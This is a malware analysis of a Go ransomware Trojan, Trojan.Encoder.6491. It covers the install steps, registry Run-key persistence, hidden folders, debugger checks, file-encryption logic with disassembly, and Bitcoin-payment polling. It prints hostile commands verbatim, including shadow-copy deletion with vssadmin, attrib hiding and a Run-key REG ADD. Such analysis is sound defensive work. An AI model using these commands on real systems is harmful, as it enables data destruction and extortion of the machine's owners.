SHA1:
- 3218c04576b08ed65530086a41659b51902fce51
A ransomware Trojan written in Go. Once launched, it performs the following actions:
- Determines the name of its executable file and checks whether it matches the name “Windows_Security.exe”. If it does, the Trojan goes to the step 6.
- Removes the folder %APPDATA%\Windows_Update.
- Creates the folder %APPDATA%\Windows_Update.
- Copies itself to the %APPDATA%\Windows_Update folder under the name Windows_Security.exe.
- Removes the original executable file and runs %APPDATA%\Windows_Update\Windows_Security.exe. The source process is then terminated.
- If the folder, from which the Trojan was launched, is not named Windows_Update, the Trojan terminates the installation.
- The Trojan executes the command
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Windows-Defender /t REG_SZ /F /D %APPDATA%\Windows_Update\Windows_Security.exe
- The Trojan executes the following commands (strings are encrypted with Base64):
attrib +H +S %APPDATA%\\Windows_Update\\ attrib +H +S %APPDATA%\\Windows_Update\\Windows_Security.exe
- Copies itself under the name %TEMP%\\Windows_Security.exe to the temporary folder and terminates itself.
The encryption is performed by the Trojan’s process launched from the folder %TEMP%. Before quitting the installation, one more function is executed:
.text:00000000004021E0 main_BypassAV proc near ; CODE XREF: main_Install:loc_401F02p
.text:00000000004021E0 ; main_BypassAV+38j
.text:00000000004021E0 mov rcx, gs:28h
.text:00000000004021E9 mov rcx, [rcx+0]
.text:00000000004021F0 cmp rsp, [rcx+10h]
.text:00000000004021F4 jbe short loc_402213
.text:00000000004021F6 call main_LongLoop
.text:00000000004021FB mov rax, cs:some_counter
.text:0000000000402202 add rax, 0Bh
.text:0000000000402206 mov cs:some_counter, rax
.text:000000000040220D call main_CheckDebugger <- calls isDebuggerPresent
.text:0000000000402212 retn
.text:0000000000402213 ; ---------------------------------------------------------------------------
.text:0000000000402213
.text:0000000000402213 loc_402213: ; CODE XREF: main_BypassAV+14j
.text:0000000000402213 call runtime_morestack_noctxt
.text:0000000000402218 jmp short main_BypassAV
.text:0000000000402218 main_BypassAV endp
When the Trojan is installed, it executes the following command:
"vssadmin.exe Delete Shadows /All /Quiet"
HKLM\Software\\Policis\\done
HKCU\Software\\Policis\\done
If one of these parameters has the value True, the encryption will not be performed. The Trojan then generates an encryption key and starts encrypting files:
.text:0000000000402403 loc_402403: ; CODE XREF: main_main+17Bj
.text:0000000000402403 mov byte ptr [rsp], 1
.text:0000000000402407 call main_EncryptExternalDrives
.text:000000000040240C lea rax, aC ; "C:\\"
.text:0000000000402413 mov [rsp], rax
.text:0000000000402417 mov qword ptr [rsp+8], 3
.text:0000000000402420 mov byte ptr [rsp+10h], 1
.text:0000000000402425 call main_EncryptDocumets
.text:000000000040242A call main_WriteRegDone
.text:000000000040242F call main_PromtPay
.text:0000000000402434 call main_ListenForPayment
.text:0000000000402439 mov rbp, [rsp+78h]
.text:000000000040243E add rsp, 80h
.text:0000000000402445 retn
The main_WriteRegDone function records values, which were obtained after the keys of the registries HKLM\Software\\Policis\\done and HKCU\Software\\Policis\\done were checked, to the system registry.
The EncryptDocumets function looks as follows:
.text:0000000000401040 main_EncryptDocumets proc near ; CODE XREF: main_EncryptDocumets+86j
.text:0000000000401040 ; main_main+145p ...
.text:0000000000401040
.text:0000000000401040 var_30 = qword ptr -30h
.text:0000000000401040 var_28 = qword ptr -28h
.text:0000000000401040 var_20 = qword ptr -20h
.text:0000000000401040 var_8 = qword ptr -8
.text:0000000000401040 arg_0 = qword ptr 8
.text:0000000000401040 arg_8 = qword ptr 10h
.text:0000000000401040 arg_10 = byte ptr 18h
.text:0000000000401040
.text:0000000000401040 mov rcx, gs:28h
.text:0000000000401049 mov rcx, [rcx+0]
.text:0000000000401050 cmp rsp, [rcx+10h]
.text:0000000000401054 jbe short loc_4010C1
.text:0000000000401056 sub rsp, 30h
.text:000000000040105A mov [rsp+30h+var_8], rbp
.text:000000000040105F lea rbp, [rsp+30h+var_8]
.text:0000000000401064 movzx eax, [rsp+30h+arg_10]
.text:0000000000401069 test al, al
.text:000000000040106B jz short loc_40109B
.text:000000000040106D mov rax, [rsp+30h+arg_0]
.text:0000000000401072 mov [rsp], rax
.text:0000000000401076 mov rax, [rsp+30h+arg_8]
.text:000000000040107B mov [rsp+8], rax
.text:0000000000401080 lea rax, encrypt
.text:0000000000401087 mov [rsp+10h], rax
.text:000000000040108C call path_filepath_Walk
.text:0000000000401091
.text:0000000000401091 loc_401091: ; CODE XREF: main_EncryptDocumets+7Fj
.text:0000000000401091 mov rbp, [rsp+30h+var_8]
.text:0000000000401096 add rsp, 30h
.text:000000000040109A retn
.text:000000000040109B ; ---------------------------------------------------------------------------
.text:000000000040109B
.text:000000000040109B loc_40109B: ; CODE XREF: main_EncryptDocumets+2Bj
.text:000000000040109B mov rax, [rsp+30h+arg_0]
.text:00000000004010A0 mov [rsp], rax
.text:00000000004010A4 mov rax, [rsp+30h+arg_8]
.text:00000000004010A9 mov [rsp+8], rax
.text:00000000004010AE lea rax, decrypt
.text:00000000004010B5 mov [rsp+10h], rax
.text:00000000004010BA call path_filepath_Walk
.text:00000000004010BF jmp short loc_401091
.text:00000000004010C1 ; ---------------------------------------------------------------------------
.text:00000000004010C1
.text:00000000004010C1 loc_4010C1: ; CODE XREF: main_EncryptDocumets+14j
.text:00000000004010C1 call runtime_morestack_noctxt
.text:00000000004010C6 jmp main_EncryptDocumets
The arg10 argument specifies whether the function performs encryption or decryption.
The Go standard function named path_filepath_Walk calls a handler for every file:
.text:0000000000684058 decrypt dq offset main_VisitD ; DATA XREF: main_EncryptDocumets+6Eo
.text:0000000000684060 encrypt dq offset main_Visit ; DATA XREF: main_EncryptDocumets+40
The main_Visit function checks a filename for the presence of the following strings:
tmp
winnt
Application Data
AppData
Program Files (x86)
Program Files
temp
thumbs.db
Recycle.Bin
System Volume Information
Boot
Windows
.enc
Instructions
Windows_Security.exe
If they are present, files are not encrypted. The Trojan encrypts 140 different types of files, depending on their extensions. Trojan.Encoder.6491 encrypts original file names with the Base64 method and appends the compromised files with the .enc extension.
The Trojan then saves the file with cybercriminals’ demands under the name %USERPROFILE%\\Desktop\\Instructions.html, opens it in a browser window, and executes the following command:
msg * All your files have been encrypted, read the note in your Desktop
The main_ListenForPayment function checks the Bitcoin e-wallet by requesting the web page
http://btc.blockr.io/api/v1/address/info/1Bww**************Yph9SxP
An example of the C&C server’s reply:
{"status":"success","data":{"address":"1Bww**************Yph9SxP ","is_unknown":true,"balance":0,"balance_multisig":0,"totalreceived":0,"nb_txs":0,"first_tx":null,"last_tx":null,"is_valid":true},"code":200,"message":""}The server’s reply received in the Json format is then saved to a special structure. These requests are sent in specified intervals. If the Trojan detects that the e-wallet balance is refilled, it automatically decrypts all compromised files using a special internal function.
Files compromised by this Trojan can be decrypted.
